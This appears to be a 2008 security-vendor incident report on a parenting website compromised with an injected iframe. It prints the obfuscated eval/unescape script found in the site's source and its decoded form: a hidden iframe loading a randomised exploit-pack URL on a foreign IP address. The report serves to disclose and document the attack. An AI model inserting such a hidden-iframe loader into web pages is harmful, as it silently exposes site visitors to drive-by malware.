Report Date: April 15, 2008
| Sitename | Yeahbaby.com |
| Nature | Injected iframe |
| First Blocked | April 7, 2008 |
| Severity | Low - on watch |
| Summary | On April 7, 2008, ScanSafe detected malicious content on the website of www.yeahbaby.com. The website provides information and resources for expectant parents and parents of newborn through toddler aged children. According to Quantcast, “This site reaches over 114K U.S. monthly uniques. The site is popular among a rather female, younger group. The typical visitor visits thinkbabynames.com, frequents babiesonline.com, and shops at babytobee.com.”
Investigation revealed the presence of a suspicious iframe embedded in the HTML source page for yeahbaby.com:
<script>eval(unescape("6964%6f2e 74747327 6f653b%64636 d%6574%2e72%69 %74283c%69726d%65 %2061653720%73 635c68743a2f%38 %38323537%3432 367063%6b69647870 70%3f2b%4d74%687275644d74% 6872%61646d29%2a%3134%39%3129%2b3338333 366%5c206974%6835376869%677433357379%6c%655c 64736c79206f65%5c3e2f%69726d3e29")); </script>
The decoded version is as follows: window.status='Done'; document.write ('<i frame name=7a src=\'http://88.255.74.226/pack/index.php? '+ Math.round(Math.random ()*174915)+'3387323 df\' width= 507 height= 345 style=\'display: none\'> </i frame>') The IP address resolves to an international route block in Turkey. At the time of investigation, the site targeted by the iframe was not reachable. |
This form was completed by: Mary Landesman
Threat Center
Security Status
Geographical Distribution of Malware
Anatomy of an Attack
